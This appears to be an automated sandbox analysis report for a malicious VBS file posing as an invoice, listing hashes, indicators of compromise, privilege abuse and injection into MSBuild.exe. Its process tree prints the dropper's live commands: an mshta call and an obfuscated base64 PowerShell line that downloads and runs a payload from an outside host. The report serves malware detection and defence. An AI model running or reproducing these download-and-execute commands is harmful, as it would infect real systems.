1c58b7edbf5afeeccdff1eda0694d86572e7e25df35cadba6d1c6cd11b6384bd

General

Target

invoice-ID711675345593.vbs
Size

317B
MD5

730f4edff655d002cbf863543d542c10
SHA1

59f1a7fdd6ff3e0a0191af7f6febaeaba1a4ae44
SHA256

1c58b7edbf5afeeccdff1eda0694d86572e7e25df35cadba6d1c6cd11b6384bd
SHA512

b16eefc3b7a188664ceb4385611305564f02585cb75a1ace40d45d49f22bf2c42686c147e09230f1d04658f5d04cfeec9fef9053604737fe3c7597bff0994441

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://nyanxcat.online/Runpe/test/N1/PS.jpg

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

6 1728 mshta.exe
7 1744 powershell.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

flow	pid	process
6	1728	mshta.exe
7	1744	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exe

pid	process
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe
1744	powershell.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

powershell.exe

description	pid	process
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeIncreaseQuotaPrivilege	1744	powershell.exe
Token: SeSecurityPrivilege	1744	powershell.exe
Token: SeTakeOwnershipPrivilege	1744	powershell.exe
Token: SeLoadDriverPrivilege	1744	powershell.exe
Token: SeSystemProfilePrivilege	1744	powershell.exe
Token: SeSystemtimePrivilege	1744	powershell.exe
Token: SeProfSingleProcessPrivilege	1744	powershell.exe
Token: SeIncBasePriorityPrivilege	1744	powershell.exe
Token: SeCreatePagefilePrivilege	1744	powershell.exe
Token: SeBackupPrivilege	1744	powershell.exe
Token: SeRestorePrivilege	1744	powershell.exe
Token: SeShutdownPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeSystemEnvironmentPrivilege	1744	powershell.exe
Token: SeRemoteShutdownPrivilege	1744	powershell.exe
Token: SeUndockPrivilege	1744	powershell.exe
Token: SeManageVolumePrivilege	1744	powershell.exe
Token: 33	1744	powershell.exe
Token: 34	1744	powershell.exe
Token: 35	1744	powershell.exe
Token: SeIncreaseQuotaPrivilege	1744	powershell.exe
Token: SeSecurityPrivilege	1744	powershell.exe
Token: SeTakeOwnershipPrivilege	1744	powershell.exe
Token: SeLoadDriverPrivilege	1744	powershell.exe
Token: SeSystemProfilePrivilege	1744	powershell.exe
Token: SeSystemtimePrivilege	1744	powershell.exe
Token: SeProfSingleProcessPrivilege	1744	powershell.exe
Token: SeIncBasePriorityPrivilege	1744	powershell.exe
Token: SeCreatePagefilePrivilege	1744	powershell.exe
Token: SeBackupPrivilege	1744	powershell.exe
Token: SeRestorePrivilege	1744	powershell.exe
Token: SeShutdownPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeSystemEnvironmentPrivilege	1744	powershell.exe
Token: SeRemoteShutdownPrivilege	1744	powershell.exe
Token: SeUndockPrivilege	1744	powershell.exe
Token: SeManageVolumePrivilege	1744	powershell.exe
Token: 33	1744	powershell.exe
Token: 34	1744	powershell.exe
Token: 35	1744	powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

WScript.exemshta.exepowershell.exe

description	pid	process	target process
PID 1068 wrote to memory of 1728	1068	WScript.exe	mshta.exe
PID 1068 wrote to memory of 1728	1068	WScript.exe	mshta.exe
PID 1068 wrote to memory of 1728	1068	WScript.exe	mshta.exe
PID 1728 wrote to memory of 1744	1728	mshta.exe	powershell.exe
PID 1728 wrote to memory of 1744	1728	mshta.exe	powershell.exe
PID 1728 wrote to memory of 1744	1728	mshta.exe	powershell.exe
PID 1744 wrote to memory of 2028	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 2028	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 2028	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 2028	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1624	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1624	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1624	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1624	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 916	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 916	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 916	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 916	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1708	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1708	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1708	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1708	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1576	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1576	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1576	1744	powershell.exe	MSBuild.exe
PID 1744 wrote to memory of 1576	1744	powershell.exe	MSBuild.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-ID711675345593.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1068

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://nyanxcat.online/Runpe/test/N1/Clean.txt
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBgAEUAWAAgACgAKABuAGAAZQBgAFcAYAAtAE8AYgBqAGAARQBgAGMAYABUACAAKAAoACcATgBlAHQAJwArACcALgAnACsAJwBXAGUAYgBjACcAKwAnAGwAaQBlAG4AdAAnACkAKQApAC4AKAAoACcARAAnACsAJwBvACcAKwAnAHcAJwArACcAbgAnACsAJwBsACcAKwAnAG8AJwArACcAYQAnACsAJwBkACcAKwAnAHMAJwArACcAdAByAGkAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAbgAnACsAJwBnACcAKQApAC4ASQBuAFYAbwBrAEUAKAAoACgAJwBoAHQAdABwADoALwAvAG4AeQBhAG4AeABjAGEAdAAuAG8AbgBsAGkAbgBlAC8AUgB1AG4AcABlAC8AdABlAHMAdAAvAE4AMQAvAFAAUwAuAGoAcABnACcAKQApACkAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAFwAfAAvACcALAAnACgAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXABcACcALAAnACkAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXAAvACcALAAnAHsAJwApAC4AcgBlAHAAbABhAGMAZQAoACcALwBcACcALAAnAH0AJwApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:2028

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1708

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1576

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1728-2-0x0000000000000000-mapping.dmp

Download
memory/1744-4-0x0000000000000000-mapping.dmp

Download
memory/1744-5-0x000007FEF38D0000-0x000007FEF42BC000-memory.dmp

Filesize
9.9MB

Download
memory/1744-6-0x0000000002310000-0x0000000002311000-memory.dmp

Filesize
4KB

Download
memory/1744-7-0x000000001AB50000-0x000000001AB51000-memory.dmp

Filesize
4KB

Download
memory/1744-8-0x00000000023E0000-0x00000000023E1000-memory.dmp

Filesize
4KB

Download
memory/1744-9-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

Filesize
4KB

Download
memory/1744-10-0x000000001C2A0000-0x000000001C2A1000-memory.dmp

Filesize
4KB

Download
memory/1744-11-0x000000001C370000-0x000000001C371000-memory.dmp

Filesize
4KB

Download
memory/1744-12-0x00000000026E0000-0x00000000026E7000-memory.dmp

Filesize
28KB

Download
memory/1744-13-0x00000000026F0000-0x00000000026F8000-memory.dmp

Filesize
32KB

Download
memory/1964-3-0x000007FEF7E60000-0x000007FEF80DA000-memory.dmp

Filesize
2.5MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads